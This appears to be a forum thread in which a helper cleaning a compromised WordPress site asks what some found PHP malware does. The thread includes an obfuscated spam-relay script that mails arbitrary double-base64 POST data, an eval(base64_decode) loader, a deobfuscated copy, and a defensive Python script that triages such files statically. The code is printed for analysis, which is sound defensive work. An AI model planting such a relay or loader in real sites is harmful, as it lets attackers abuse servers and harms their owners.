PHP attack on server, what is this code doing?

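So I've been helping out someone with WordPress who has been having malware trouble on their GoDaddy server. I think I have removed the code that was causing the problem, but I'm just curious what this PHP is doing. It seems to loop through the variables stored in POST and try to decode any information, then send it by email... Can anyone help me understand this? Cheers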

<?php 
    $data = array('');
    foreach ($_POST as $key => $value) {
        array_push($data, $value);
    }
    $jxWnO = stripslashes(base64_decode(base64_decode($data[1] ))); 
    $e2WPWta = stripslashes(base64_decode(base64_decode($data[2] ))); 
    $hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3] )));  
    $JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4] )));  
    $Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
    if ($Fr2ZEIZYuKj) { 
        echo $Fr2ZEIZYuKj;
    } else { 
        echo '99';
    }
?>

And then in a separate file:

<?php $code=base64_decode("..."); eval("return eval(\"$code\");") ?>

Renamed the variables to make it easier to read...

<?php
    $data = array('');
    // Takes a post submitted to this url
    foreach ($_POST as $key => $value) {
        array_push($data, $value);
    }
    // For each post form field in the array it adds them to vars after decoding them twice.
    $sVar1 = stripslashes(base64_decode(base64_decode($data[1] ))); 
    $sVar2 = stripslashes(base64_decode(base64_decode($data[2] ))); 
    $sVar3 = stripslashes(base64_decode(base64_decode($data[3] )));  
    $sVar4 = stripslashes(base64_decode(base64_decode($data[4] )));  
    // Then it emails the data submitted to the email contained in var1
    // bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
    $sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4));
    // Outputs mail return function (success/error(99)) TRUE | FALSE
    if ($sVar5) { 
        // If TRUE prints var5
        echo $sVar5;
    } else { 
        // If does not email successfully prints 99
        echo '99';
    }

This is very interesting - can you expand on how the two files/code snippets are related and interact with each other?

After decoding, the second script is slightly less obfuscated:

"\$var1 = array(''); 
\x66\x6F\x72\x65\x61\x63\x68 (\$\x5F\x50\x4F\x53\x54 as \$var2 => \$var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68(\$var1, \$var3);} 
\$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[1] ))); 
\$var4 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[2] ))); 
\$var8 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[3] ))); 
\$var5 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[4] ))); 
\$var6 = \x6D\x61\x69\x6C(\x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var7), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var4), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var8), \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\$var5)); 
\x69\x66 (\$var6){ \x65\x63\x68\x6F \$var6;} else { \x65\x63\x68\x6F '\x39\x39';}"
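
A static way to read a script like this without running it, as an added example (not code from the original thread): it resolves the hex and `\$` escapes as plain text, then counts the calls a plain search of the obfuscated file would miss. `SAMPLE` is a shortened copy of the decoded script with a simplified `mail()` line; the function names and the watch list are assumptions made for this example.

```python
import re

# Shortened copy of the decoded second script (mail() line simplified for this example).
SAMPLE = r"""\$var1 = array('');
\x66\x6F\x72\x65\x61\x63\x68 (\$\x5F\x50\x4F\x53\x54 as \$var2 => \$var3) {\x61\x72\x72\x61\x79\x5F\x70\x75\x73\x68(\$var1, \$var3);}
\$var7 = \x73\x74\x72\x69\x70\x73\x6C\x61\x73\x68\x65\x73(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65(\$var1[1] )));
\$var6 = \x6D\x61\x69\x6C(\$var7, \$var4, \$var8, \$var5);
"""

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# Calls worth a second look in an uploaded PHP file (assumed watch list, extend as needed).
WATCHED = ("eval", "assert", "base64_decode", "mail", "system", "exec", "passthru")


def unescape_php(src):
    # Resolve hex and dollar/quote escapes the way a PHP double-quoted string would,
    # purely as text: nothing from the sample is executed.
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)
    return text.replace("\\$", "$").replace('\\"', '"')


def flag_calls(src):
    # Count call sites of watched functions; the lookbehind skips $mail or my_mail.
    hits = {}
    for name in WATCHED:
        count = len(re.findall(r"(?<![\w$])" + re.escape(name) + r"\s*\(", src))
        if count:
            hits[name] = count
    return hits


def triage(src):
    clear = unescape_php(src)
    calls = flag_calls(clear)
    reads_post = "$_POST" in clear
    return {
        "clear": clear,
        "calls_before": flag_calls(src),  # what a plain grep on the file would see
        "calls": calls,
        "reads_post": reads_post,
        # Request data flowing into mail() means anyone can send mail through the host.
        "mail_relay": reads_post and "mail" in calls,
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["clear"])
    print(report["calls_before"], "->", report["calls"], "relay:", report["mail_relay"])
```
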